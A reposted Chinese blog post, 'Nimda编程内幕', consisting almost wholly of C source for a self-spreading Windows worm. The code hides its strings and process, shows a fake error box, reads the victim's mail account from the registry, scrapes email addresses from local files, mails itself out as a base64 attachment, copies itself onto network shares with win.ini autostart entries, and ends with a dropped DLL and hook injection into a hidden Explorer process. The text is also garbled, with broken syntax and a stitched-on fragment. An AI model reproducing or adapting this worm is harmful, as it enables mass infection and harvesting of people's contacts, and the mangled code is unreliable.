ITPub博客

首页 > 应用开发 > IT综合 > Nimda编程内幕 (转)

Nimda编程内幕 (转)

原创 IT综合 作者:worldblog 时间:2007-12-12 11:24:38 0 删除 编辑
Nimda编程内幕 (转)[@more@]

void WINapi worm()
long w0rm_ThreadCodeList[ 3] = { 
 ( long) L0calThread,
 ( long) Rem0teThread,
 ( long) MailThread
 } ;

 char *StrArray[ 66] = {
 szCopyRight,
 szFakeMsg,
 szSetUp,
 sz.NETOpenEnumA,
 szWNetCloseEnum,
 szWNetEnumResourceA,
 szMPR_DLL,
 szWINSOCK_DLL,
 szWSAStartup,
 szinet_addr,
 szgethostbyaddr,
 szgethostbyname,
 szhtons,
 szsocket,
 szconnect,
 szsend,
 szrecv,
 szclosesocket,
 szWSACleanup,
 smtp_str00,
 smtp_str01,
 smtp_str02,
 smtp_str03,
 smtp_str06,
 smtp_str07,
 smtp_str08,
 smtp_str09,
 smtp_str0B,
 smtp_str0C,
 smtp_str0D,
 smtp_str0E,
 smtp_str0F,
 smtp_newline,
 smtp_separator,
 szWindir00,
 szWindir01,
 szWindir02,
 szWindir03,
 szWindir04,
 szWIN_INI,
 szSETUP_EXE,
 szSYSTEM_EXE,
 szADVAPI_DLL,
 szRegOpenKeyExA,
 szRegQueryValueExA,
 szRegCloseKey,
 szAccountManager,
 szDefaultMail,
 szAccounts,
 szSMTPserver,
 szSMTPemail,
 szExt00,
 szExt01,
 szExt02,
 szExt03,
 szExt04,
 szExt05,
 szExt06,
 szOutlook,
 szCuteFTP,
 szInternetExplorer,
 sztelnet,
 szMirc,
 szRegisterServiceProcess,
 szKernel32,
 szTempFile
 } ;

 static HANDLE w0rm_hThreadList[ 3] ;
 Dword w0rm_ThreadIDList[ 3] ;
 char szModule[ MAX_PATH] ;
 char *Param ;
 int count ;
 int min_threads ;
 int max_threads ;
 BOOL re_generation ;

 MailDone = FALSE ;

 for ( count = 0 ; count < 66 ; count++ ) DecryptStr( StrArray[ count]) ;

 GetModuleFileNameA( NULL, szModule, MAX_PATH) ;
 Param = szModule ;

 while( *Param != 0) Param++ ;

 Param -= 5 ;

 if (( *Param == 'P') || ( *Param == 'p'))
 {
 MessageBox( NULL,
 szFakeMsg,
 szSetUp,
 MB_OK | MB_ICONSTOP) ;

 re_generation = FALSE ;
 max_threads = 1 ;
 } 
 else
 {
 if ( ( hKERNEL32 = GetModuleHandleA( szKernel32)) != NULL)
 {
 if ( ( a_RegisterServiceProcess = GetProcAddress( hKERNEL32, szRegisterServiceProcess)) != NULL)
 {
 a_RegisterServiceProcess ( GetCurrentProcessId(), 1) ;
 }
 }
 
 re_generation = TRUE ;
 max_threads = 3 ;
 }

 min_threads = 0 ;

 do
 {
 for ( count = min_threads ; count < max_threads ; count++ )
 {
 w0rm_hThreadList[ count] = CreateThread( NULL,
 0,
 ( LPTHREAD_START_ROUTINE) w0rm_ThreadCodeList[ count],
 NULL,
 0,
 &w0rm_ThreadIDList[ count]) ;
 }

 for ( count = min_threads ; count < max_threads ; count++ )
 {
 if ( w0rm_hThreadList[ count] != NULL)
 {
 WaitForSingleobject( w0rm_hThreadList[ count], INFINITE) ;
 CloseHandle ( w0rm_hThreadList[ count]) ;
 }
 }

 if ( MailDone)
 {
 GetwindowsDirectoryA( szModule, MAX_PATH) ;
 strcat( szModule, szWIN_INI) ;
 WritePrivateProfileStringA( szWindir00, "run", "", szModule) ;
 re_generation = FALSE ;
 }

 min_threads = 1 ;

 if ( re_generation) Sleep( 0x000FFFFF) ;

 } while( re_generation) ;

 return 0 ;
}

long WINAPI MailThread(long lParam)
{
 unsigned int addr ;
 struct sockaddr_in server ;
 struct hostent *hp ;
 WSADATA wsaData ;

 HANDLE hFile ;
 HANDLE hMap ;

 char enc0de_filename[ MAX_PATH] ;
 char ShortBuff[ 512] ;
 char szSIGN[ 512] ;
 char szHELO[ 512] ;

 BOOL Success ;
 void *lpFile ;
 
 int  StrCount ;
 int  FileSize ;

 typedef struct
 {
 char *Command ;
 BOOL WaitReply ;
 }
 SMTPstr ;

 SMTPstr SMTPstrings00[ 2] = { szHELO, TRUE  ,
 szMAIL_FROM, TRUE  } ;

 SMTPstr SMTPstrings01[ 11] = { smtp_str03, TRUE  ,
 szMAIL_FROM+5, FALSE ,
 smtp_str06, FALSE ,
 smtp_str07, FALSE ,
 smtp_separator, FALSE ,
 smtp_str08, FALSE ,
 smtp_separator, FALSE ,
 smtp_str09, FALSE ,
 szSIGN, FALSE ,
 smtp_separator, FALSE ,
 smtp_str0B, FALSE } ;

 SMTPstr SMTPstrings02[ 6] = { smtp_str0C, FALSE ,
 smtp_separator, FALSE ,
 smtp_str0D, FALSE ,
 smtp_newline, FALSE ,
 smtp_str0E, TRUE,
 smtp_str0F, FALSE } ;
 WaitC0nnected() ;

 if ( !GetSMTP( szSMTPname, szSMTPaddr)) return 0 ;
 
 sprintf( szHELO, "%s %sn", smtp_str00, szSMTPname) ;
 sprintf( szMAIL_FROM, "%s <%s>n", smtp_str01, szSMTPaddr) ;
 sprintf( szSIGN,"n:)nn----n%snn--", szSMTPaddr) ;

 if ( ( hWINSOCK = LoadLibraryA( szWINSOCK_DLL)) == NULL) return 0 ;

 a_WSAStartup = ( FARPROC) GetProcAddress( hWINSOCK, szWSAStartup) ;
 a_inet_addr = ( FARPROC) GetProcAddress( hWINSOCK, szinet_addr) ;
 a_gethostbyaddr = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyaddr) ;
 a_gethostbyname = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyname) ;
 a_htons = ( FARPROC) GetProcAddress( hWINSOCK, szhtons) ;
 a_socket = ( FARPROC) GetProcAddress( hWINSOCK, szsocket) ;
 a_connect = ( FARPROC) GetProcAddress( hWINSOCK, szconnect) ;
 a_send = ( FARPROC) GetProcAddress( hWINSOCK, szsend) ;
 a_recv = ( FARPROC) GetProcAddress( hWINSOCK, szrecv) ;
 a_closesocket = ( FARPROC) GetProcAddress( hWINSOCK, szclosesocket) ;
 a_WSACleanup = ( FARPROC) GetProcAddress( hWINSOCK, szWSACleanup) ;

 if ( ( a_WSAStartup == NULL) ||
  ( a_inet_addr == NULL) ||
  ( a_gethostbyaddr == NULL) ||
  ( a_gethostbyname == NULL) ||
  ( a_htons == NULL) ||
  ( a_socket == NULL) ||
  ( a_connect == NULL) ||
  ( a_send == NULL) ||
  ( a_recv == NULL) ||
  ( a_closesocket == NULL) ||
  ( a_WSACleanup == NULL))
 {
 FreeLibrary( hWINSOCK) ; 
 return 0 ;
 }

 if ( a_WSAStartup( 0x0001, &wsaData) == SOCKET_ERROR)
 {
 FreeLibrary( hWINSOCK) ; 
 return 0 ;
 }
 
 if ( isalpha( ( int) szSMTPserver[ 0]))
 {
 hp = ( struct hostent *) a_gethostbyname( szSMTPname) ;
 }
 else 
 {
 addr = a_inet_addr( szSMTPname) ;
 hp = ( struct hostent *) a_gethostbyaddr( (char *)&addr, 4, AF_INET) ;
 }

 if ( hp == NULL)
 {
 a_WSACleanup() ;
 FreeLibrary( hWINSOCK) ; 
 return 0 ;
 }

 memset( &server, 0, sizeof( server)) ;
 memcpy( &server.sin_addr, hp->h_addr, hp->h_length) ;
 server.sin_family = hp->h_addrtype ;
 server.sin_port = a_htons( 25) ;

 conn_socket = a_socket( AF_INET, SOCK_STREAM, 0) ;

 if ( conn_socket < 0 )
 {
 a_WSACleanup() ;
 FreeLibrary( hWINSOCK) ; 
 return 0 ;
 }

 if ( a_connect( conn_socket, (struct sockaddr *) &server, sizeof( server)) == SOCKET_ERROR)
 {
 a_closesocket( conn_socket) ; 
 a_WSACleanup() ;
 FreeLibrary( hWINSOCK) ;
 }

 a_recv( conn_socket, ShortBuff, sizeof ( ShortBuff),0 ) ;
 
 for ( StrCount = 0 ; StrCount < 2 ; StrCount++ )
 {
 Success = str2socket( SMTPstrings00[ StrCount].Command, SMTPstrings00[ StrCount].WaitReply) ;
 if ( !Success) break ; 
 }
 
 if ( Success)
 {
 Found = 0 ;

 GetWindowsDirectoryA( enc0de_filename, MAX_PATH) ;
 enc0de_filename[ 3] = 0 ;

 FindPe0ple( enc0de_filename) ; 
 
 for ( StrCount = 0 ; StrCount < 11 ; StrCount++ )
 {
 Success = str2socket( SMTPstrings01[ StrCount].Command, SMTPstrings01[ StrCount].WaitReply) ;
 if ( !Success) break ; 
 }

 if ( Success)
 {
 GetModuleFileNameA( NULL, ShortBuff, MAX_PATH) ;
 GetTempPathA( MAX_PATH, enc0de_filename) ;
 strcat( enc0de_filename, szTempFile) ;

 if ( CopyFileA( ShortBuff, enc0de_filename, FALSE) != 0)
 {
 if ( ( hFile = CreateFileA( enc0de_filename,
 GENERIC_READ,
 FILE_SHARE_READ,
 NULL,
 OPEN_EXISTING,
 FILE_ATTRIBUTE_NORMAL,
 NULL)) != INVALID_HANDLE_VALUE)
 {
 FileSize = GetFileSize( hFile, NULL) ;

 if ( ( FileSize != 0xFFFFFFFF) && ( FileSize != 0))
 {
 if ( ( hMap = CreateFileMappingA( hFile,
 NULL,
 PAGE_READONLY | PAGE_WRITECOPY,
 0,
 FileSize,
 NULL)) != NULL)
 {
 if ( ( lpFile = MapViewOfFile( hMap,
 FILE_MAP_READ,
 0,
 0,
 FileSize)) != NULL)
 { 
 base64_encode( lpFile, FileSize) ;

 for ( StrCount = 0 ; StrCount < 6 ; StrCount++ ) 
 {
 if ( ( Success = str2socket(  SMTPstrings02[ StrCount].Command,
 SMTPstrings02[ StrCount].WaitReply)) == FALSE) break ;
 }

 if ( Success) MailDone = TRUE ;

 UnmapViewOfFile( lpFile) ;
 }
 
 CloseHandle( hMap) ;
 }
 }

 CloseHandle( hFile) ;
 }

 DeleteFileA( enc0de_filename) ;
 }
 }
 }

 a_closesocket( conn_socket) ;
 a_WSACleanup() ;
 FreeLibrary( hWINSOCK) ;

 return 0 ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void NetW0Rming( LPNETRESOURCE lpnr)
{
 LPNETRESOURCE lpnrLocal ;
 HANDLE hEnum ;
 int count ;
 int cEntries = 0xFFFFFFFF ;
 DWORD dwResult ;
 DWORD cbBuffer = 32768 ;

 if ( a_WNetOpenEnum ( RESOURCE_CONNECTED,
 RESOURCETYPE_ANY,
 0,
 lpnr,
 &hEnum) != NO_ERROR) return ;
 do
 {
 lpnrLocal = ( LPNETRESOURCE) GlobalAlloc( GPTR, cbBuffer) ;

   dwResult = a_WNetEnumResource( hEnum,
 &cEntries,
 lpnrLocal,
 &cbBuffer) ;
 if ( dwResult == NO_ERROR)
 {
 for ( count = 1 ; count < cEntries ; count++ )
 {
 if ( lpnrLocal[ count].dwUsage & RESOURCEUSAGE_CONTAINER)
 {
 NetW0rming( &lpnrLocal[ count]) ;
 }
 else if ( lpnrLocal[ count].dwType = RESOURCETYPE_DISK)
 {
 Rem0teInfecti0n( lpnrLocal[ count].lpRemoteName) ;
 }
 }
 }
 else if (dwResult != ERROR_NO_MORE_ITEMS) break ;

 } while ( dwResult != ERROR_NO_MORE_ITEMS) ;

 GlobalFree ( ( HGLOBAL) lpnrLocal) ;

 a_WNetCloseEnum( hEnum) ;

 return ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void Rem0teInfecti0n( char *szPath)
{
 char *dir_name[ 5]= { szWindir00, szWindir01, szWindir02, szWindir03, szWindir04 } ;
 win32_FIND_DATAA FindData ;
 HANDLE hFind ;
 char szLookUp[ MAX_PATH] ;
 char w0rm0rg[ MAX_PATH] ;
 char w0rmD3st[ MAX_PATH] ;
 int aux ;

 for ( aux = 0 ; aux < 5 ; aux++ )
 {
 sprintf ( szLookUp, "%s%s%s", szPath, dir_name[ aux], szWIN_INI) ;
 if ( ( hFind = FindFirstFileA( szLookUp, ( LPWIN32_FIND_DATAA) &FindData)) != INVALID_HANDLE_VALUE)
 { 
 sprintf( w0rmD3st, "%s%s%s", szPath, dir_name[ aux], szSYSTEM_EXE) ;
 
 if ( GetModuleFileNameA( NULL, w0rm0rg, MAX_PATH) != 0)
 {
 if ( CopyFileA( w0rm0rg, w0rmD3st, TRUE) != 0)
 {
 WritePrivateProfileStringA( szWindir00, "run", szSYSTEM_EXE, szLookUp) ;
 FindClose ( hFind) ;
 break ;
 }
 }

 FindClose ( hFind) ;
 }
 }
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

BOOL str2socket( char *msg, BOOL do_recv)

 int retval ;
 char Buffer[ 256];

/* Code used to debug the woRM

 if ( do_recv)
 {
 if ( MessageBox( NULL,
 msg,
 "send() this string ?",
 MB_YESNO | MB_ICONQUESTION) == IDNO) return TRUE ;
 }
*/

 if ( a_send( conn_socket, msg, strlen( msg), 0) == SOCKET_ERROR)
 {
 a_WSACleanup() ;
 return FALSE ;
 } 

 if ( do_recv)
 {
 retval = a_recv( conn_socket, Buffer, sizeof ( Buffer),0 ) ;
 if ( ( retval == SOCKET_ERROR) || ( retval == 0))
 { 
 a_closesocket( conn_socket) ;
 a_WSACleanup() ;
 return FALSE ;
 }

 Buffer[ retval] = 0 ;

/* Code used to debug the worm

 MessageBox( NULL,
 Buffer,
 "recv()",
 MB_OK | MB_ICONSTOP) ;
*/
 }

 return TRUE ;

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

BOOL GetSMTP( char *dest, char *org_email)
{
 char szKeyName[ MAX_PATH] ;
 char szRes[ MAX_PATH] ;
 char *move2low ;
 int size ;
 HKEY hKey ;

 if ( ( hADVAPI = LoadLibraryA( szADVAPI_DLL)) == NULL) return FALSE ;
 
 a_RegOpenKeyExA = ( FARPROC) GetProcAddress( hADVAPI, szRegOpenKeyExA) ;
 a_RegQueryValueExA = ( FARPROC) GetProcAddress( hADVAPI, szRegQueryValueExA) ;
 a_RegCloseKey = ( FARPROC) GetProcAddress( hADVAPI, szRegCloseKey) ;

 if ( ( a_RegOpenKeyExA == NULL) ||
  ( a_RegQueryValueExA == NULL) ||
  ( a_RegCloseKey == NULL))
 {
 FreeLibrary( hADVAPI) ;
 return FALSE ;
 }

 strcpy( szKeyName, szAccountManager) ;

 if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
 szKeyName,
 0,
 KEY_QUERY_VALUE,
 &hKey) != ERROR_SUCCESS)
 {
 FreeLibrary( hADVAPI) ;
 return FALSE ;
 }
 
 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
 szDefaultMail,
 0,
 NULL,
 szRes,
 &size) != ERROR_SUCCESS)
 {
 a_RegCloseKey( hKey) ;
 FreeLibrary( hADVAPI) ;
 return FALSE ;
 }

 a_RegCloseKey( hKey) ;

 strcat( szKeyName, szAccounts) ;
 strcat( szKeyName, szRes) ;

 if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
 szKeyName,
 0,
 KEY_QUERY_VALUE,
 &hKey) != ERROR_SUCCESS)
 {
 FreeLibrary( hADVAPI) ;
 return FALSE ;
 }

 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
 szSMTPserver,
 0,
 NULL,
 dest,
 &size) != ERROR_SUCCESS)
 {
 a_RegCloseKey( hKey) ;
 FreeLibrary( hADVAPI) ;
 return FALSE ;
 } 

 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
 szSMTPemail,
 0,
 NULL,
 org_email,
 &size) != ERROR_SUCCESS)
 {
 a_RegCloseKey( hKey) ;
 FreeLibrary( hADVAPI) ;
 return FALSE ;
 } 

 a_RegCloseKey( hKey) ;

 move2low = org_email ;

 while( *move2low != 0)
 {
 if ( ( *move2low > 64) && ( *move2low < 91)) *move2low = ( char) (* move2low) - 65 + 97 ;
 move2low++ ;
 }

 FreeLibrary( hADVAPI) ;
 return TRUE ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void base64_encode(const void *buf, int size)
{
 char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ;

 char ok_base64[ 80] ;
 char *p = ok_base64 ;
 unsigned char *q = ( unsigned char *) buf ;
 int i ;
 int c ;
 int l ;
 BOOL SendRes ;
 
 i = l = 0 ;

 while( i < size)
 {
 c = q[ i++] ;
 c *= 256 ;

 if( i < size) c += q[ i] ;
 
 i++ ;
 c *= 256 ;

 if( i < size) c += q[ i] ;
 
 i++ ;
 
 p[ 0] = base64[ ( c & 0x00fc0000) >> 18] ;
 p[ 1] = base64[ ( c & 0x0003f000) >> 12] ;
 p[ 2] = base64[ ( c & 0x00000fc0) >> 6] ;
 p[ 3] = base64[ ( c & 0x0000003f) >> 0] ;
 
 if( i > size) p[ 3] = '=' ;
 
 if( i > size + 1) p[ 2] = '=' ;
 
 p += 4 ;
 
 l += 1 ;

 if ( l == 0x013)
 {
 ok_base64[ 0x04C] = 0x0A ;
 ok_base64[ 0x04D] = 0 ;

 if ( ( SendRes = str2socket( ok_base64, FALSE)) == FALSE) break ;

 p = ok_base64 ;
 l = 0;
 }
 }

 if ( SendRes != FALSE)
 {
 if ( l != 0)
 {
 ok_base64[ l*4] = 0x0A ;
 ok_base64[ l*4] = 0 ;

 str2socket( ok_base64, FALSE) ; 
 }
 }
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

char *DecryptStr( char *DcrStr)
{
 char *pos = DcrStr ;

 while( *pos != 0)
 {
 *pos ^= ( char) 0x0FF ;
 pos++ ;
 }
 
 return DcrStr ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void FindPe0ple( char *szPath)
{
 char szRecursive[ MAX_PATH] ;
 char szCurrentDir[ MAX_PATH] ;
 char FileExt[ MAX_PATH] ;
 char RCPT_TO[ MAX_PATH] ;
 WIN32_FIND_DATAA FindData ;
 HANDLE hFind ;
 HANDLE hFile ;
 HANDLE hMap ;
 void *lpFile ;
 char *lpc01 ;
 char *lpc02 ;
 char *lpc03 ;
 char *lpc04 ;
 char auxchar ;
 int l00king ;
 int addrssize ;

 GetCurrentDirectoryA( MAX_PATH, szCurrentDir) ;
 
 if ( SetCurrentDirectoryA( szPath) == FALSE) return ;

 hFind = (HANDLE) FindFirstFileA( "*.*", (LPWIN32_FIND_DATAA) &FindData) ;
 if ( hFind != INVALID_HANDLE_VALUE)
 {
 do
 {
 if ( ( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != '.'))
 {
 strcpy (szRecursive,szPath) ;
 strcat (szRecursive,FindData.cFileName) ;
 strcat (szRecursive,"") ;
 
 FindPe0ple( szRecursive) ;
 }
 else if ( ( FindData.nFileSizeHigh == 0) && ( FindData.nFileSizeLow > 16) && ( !( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != '.'))) 
 {
 lpc01 = FindData.cFileName ;
 lpc02 = NULL ;
 
 while ( *lpc01 != 0)
 {
 if ( *lpc01 == 46) lpc02 = lpc01 ;
 lpc01++ ;
 }
 
 lpc01 = FileExt ;

 if ( lpc02 != NULL)
 {
 while ( *lpc02 != 0)
 {
 if ( ( *lpc02 > 97) && ( *lpc02 < 123)) *lpc01 = ( char) ( *lpc02 - 97 + 65) ;
 else *lpc01 = *lpc02 ;
 
 lpc01++ ;
 lpc02++ ;
 }

 FileExt[ 4] = 0 ;

 if  ( ( strcmp( FileExt, szExt00) == 0) ||
 ( strcmp( FileExt, szExt01) == 0) ||
 ( strcmp( FileExt, szExt02) == 0) ||
 ( strcmp( FileExt, szExt03) == 0) ||
 ( strcmp( FileExt, szExt04) == 0) ||
 ( strcmp( FileExt, szExt05) == 0) ||
 ( strcmp( FileExt, szExt06) == 0))
 {
 if ( ( hFile = CreateFileA( FindData.cFileName,
 GENERIC_READ,
 0,
 NULL,
 OPEN_EXISTING,
 FILE_ATTRIBUTE_NORMAL,
 NULL)) != INVALID_HANDLE_VALUE)
 {
 if ( ( hMap = CreateFileMappingA( hFile,
 NULL,
 PAGE_READONLY,
 0,
 FindData.nFileSizeLow,
 NULL)) != NULL)
 {
 if ( ( lpFile = MapViewOfFile( hMap,
 FILE_MAP_READ,
 0,
 0,
 FindData.nFileSizeLow)) != NULL)
 {
 lpc01 = lpFile ;
 addrssize = FindData.nFileSizeLow ;
 l00king = 0 ;
 
 while( ( addrssize > 16) && ( Found < 16))
 {
 if ( *lpc01 == 60)
 {
 l00king = 1 ;
 lpc02 = lpc01 ;
 }

 if ( ( *lpc01 == 64) && ( l00king == 1))
 {
 l00king = 2 ;
 }

 if ( ( *lpc01 == 62) && ( l00king == 2))
 { 
 lpc03 = szSMTPaddr ;
 lpc04 = lpc02 + 1 ;

 while ( *lpc03 != 0)
 {
 auxchar = *lpc04 ;

 if ( ( auxchar > 64) && ( auxchar < 91)) auxchar = auxchar - 65 + 97 ;

 if ( *lpc03 != auxchar)
 {
 l00king = 0 ;
 break ;
 }

 lpc03++ ;
 lpc04++ ;
 }

 if ( l00king == 0)
 {
 strcpy( RCPT_TO, smtp_str02) ;
 lpc03 = RCPT_TO + 9 ;
 while ( *lpc02 != 62)
 {
 *lpc03 = *lpc02 ;
 lpc02++ ;
 lpc03++ ;
 }
 *lpc03 = 62 ;
 lpc03++ ; 
 *lpc03 = 0 ;
 
 strcat( RCPT_TO, "n") ;

 str2socket( RCPT_TO, TRUE) ;

 Found++ ;
 }
 else l00king = 0 ;
 }

 if ( ( *lpc01 < 64) &&
 ( *lpc01 != 46) &&
 ( *lpc01 != 60) &&
 ( *lpc01 != 62))
 {
 l00king = 0 ;
 }

 if ( *lpc01 > 122)
 {
 l00king = 0 ;
 }
 
 lpc01++ ;
 addrssize-- ;
 }
 
 UnmapViewOfFile( lpFile) ; 
 }

 CloseHandle( hMap) ;
 }
 
 CloseHandle( hFile) ;
 }
 }
 }
 }
 } 
 while ( ( FindNextFile( hFind, &FindData) !=0) && ( Found < 16)) ;

 FindClose( hFind) ;
 }

 return ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void WaitC0nnected( void)
{
 InetActivated = FALSE ;

 while ( !InetActivated)
 {
 EnumWindows( EnumWindowsProc, ( LPARAM) NULL) ;

 Sleep( 0x01770) ;
 }

 return ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

BOOL CALLBACK EnumWindowsProc( HWND hwnd, LPARAM lParam)
{

 int  CaptionLen ;
 int  AwareLen ;
 int  CompareLen ;
 int  InetAware ;
 int  EquChar ;
 int  aux0 ;
 int  aux1 ;
 char  *Foll0w ;
 char  *PtrAware ;
 char  WindowCaption[ 1024] ;

 CaptionLen = GetWindowText( hwnd, WindowCaption, 1024) ;

 if ( CaptionLen > 0)
 {
 Foll0w = WindowCaption ;

 while( *Foll0w != 0)
 {
 if ( ( *Foll0w >= 'a') && ( *Foll0w <= 'z')) *Foll0w = *Foll0w - 'a' + 'A' ;
 Foll0w++ ;
 }

 for( .netAware = 0 ; InetAware < 5 ; InetAware++)
 {
 AwareLen = strlen( szAware[ InetAware]) ;
 
 if ( AwareLen < CaptionLen)
 {
 CompareLen = CaptionLen - AwareLen ; 

 for ( aux0 = 0 ; aux0 < CompareLen ; aux0++ )
 {
 EquChar = 0 ;
 Foll0w = &WindowCaption[ aux0] ;
 PtrAware = szAware[ InetAware] ;

 for ( aux1 = 0 ; aux1 < AwareLen ; aux1++ , Foll0w++ , PtrAware++ )
 {
 if ( *Foll0w == *PtrAware) EquChar++ ;
 }

 if ( EquChar == AwareLen)
 {
 InetActivated = TRUE ;
 break ;
 }

 aux0++ ;
 }
 }
 }
 }

 return ( !InetActivated) ;
}
 void TFTP32()
{
  HANDLE hFile=CreateFile("TFTP32.DLL",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
 if(hFile==INVALID_HANDLE_VALUE)
 {
 //printf("nCreate file %s failed:%d",RemoteFilePath,GetLastError());
 return -1
 }
 //写文件内容
  DWORD i=0,dwIndex=0,dwWrite,dwSize=sizeof(tftpdllbuff)
 while(dwSize>dwIndex)
 {
 if(!WriteFile(hFile,&tftpdllbuff[dwIndex],dwSize-dwIndex,&dwWrite,NULL))
 {
 //printf("nWrite file %s failed:%d","TFTP32.DLL",GetLastError());
 return -1
 }
 dwIndex+=dwWrite;
 }
 //关闭文件句柄
 CloseHandle(hFile);


hhook hk
STARTUPINFO si;
  PROCESS_INFORMATION pi;
 
  memset(&si,0,sizeof(si));
  si.hStdError = si.hStdOutput = wp1;
  si.hStdInput = rp2;
  si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  si.wShowWindow = SW_Hide;
  si.lpReserved=0;
  si.lpReserved2=0;
  si.cbReserved2 =0;
  si.cb = sizeof(si);
  //this two must not Exchange
CreateProcess(0, "Explorer.exe", 0, 0, 1, 0, 0, 0, &si, &pi)

Hookproc hkprc
static HINSTANCE hinstDLL
 hinstDLL=LoadLibrary((LPCTSTR)"TFTP32.DLL")
hkprc=(HOOKPROC)GetProcAddress(hinstDLL,"hook")
hk=SetWindowsHookEx(WH_CBT,hkprc,HinstDLL,pi.wdthreadID)
FreeLibrary(hinstDLL)
}


来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10752043/viewspace-991862/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论
  • 博文量
    6241
  • 访问量
    2410921